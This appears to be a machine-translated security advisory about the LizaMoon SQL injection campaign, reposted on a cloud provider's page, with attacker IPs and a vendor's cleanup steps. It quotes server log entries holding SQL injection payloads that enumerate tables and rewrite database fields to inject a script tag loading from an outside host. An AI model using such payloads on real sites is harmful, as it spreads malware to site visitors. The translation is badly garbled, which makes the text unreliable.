Lizamoon.com Trojan Solution

Source: Internet
Author: User

websense, a foreign security vendor, recently issued an alarm saying that a SQL Injection hacker attack called Lisa Moon (English name: lizamoon) is sweeping the world. In just a few days, the number of attacked web pages has rapidly increased to 1030000 (as of on January 10, April 2). Foreign media reported that it was "a tsunami outbreak ", even websites of well-known companies such as Apple are listed. At the same time, the number of Chinese webpages affected by Lisa moon has reached 46800 .

  • Several suspicious IP addresses: 95.64.9.18 (from Romania), 91.217.162.45 (from Ukraine, famous evil Network) 
  • Valuable iislog provided by netizens (this is a very important clue for intrusion identification)  

    16:34:45 w3svc1746246233 * myserverip * Get/DIR/linkdetail. aspx id = 11011 + or + 1 = ( Select + TOP + 1 + table_name + from + information_schema.tables + Where + table_name + not + in + (select + TOP + 0 + table_name + from + information_schema.tables) -- 80-91.217.162.45 Mozilla/5.0 + (windows; + U; + windows + nt + 5.0; + en-US; + RV: 1.4) + Gecko/20030624 + Netscape/7.1 + (ax) 500 0 0  

    Doc. asp? Id = pu000031 + Update + gcategoriashistoricotiposdescripciones + set + descripcion = Replace (cast (descripcion + As + varchar (8000), cast (char (60) % 2 bchar (47) % 2 bchar (116) % 2 bchar (105 ).... omitted. the CHR (NN) character is used to group A character </title> <SCRIPT src = httq: // lazemoon. COM/UR. php> </SCRIPT>... % 2 bchar (116) % 2 bchar (62) + As + varchar (8000), cast (char (32) + As + varchar (8 ))) -- 95.64.9.18 Mozilla/5.0 + (windows; + U; + windows + nt + 5.0; + en-US; + RV: 1.4) + Gecko/20030624 + Netscape/7.1 + (ax)-302 498  

    17:56:49 <my server IP address> Get/<pagename>. asp prod = mg0011 '+ Update + tblmembers + set + forename = Replace (cast (forename + As + varchar (8000 )), Cast (char (60) % 2 bchar (47) % 2 bchar (116) % 2 bchar (105 ).... omitted. the CHR (NN) character is used to group A character </title> <SCRIPT src = httq: // lazemoon. COM/UR. php> </SCRIPT>... % 2 bchar (116) % 2 bchar (62) + As + varchar (8000), cast (char (32) + As + varchar (8) -- 80-   95.64.9.18  HTTP/1.1 Mozilla/5.0 + (windows; + U; + windows + nt + 5.0; + en-US; + RV: 1.4) + Gecko/20030624 + Netscape/7.1 + (ax)  

 

Solution

1. Download web anti-virus software,AddressHttp://www.safe3.com.cn/works/884981847/view.aspxTo clear the data of the Trojan field in the database.

2. download and install the safe3 web application firewall to protect the website,Address: http://www.safe3.com.cn/works/271360615/view.aspx.

 

3. Success.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.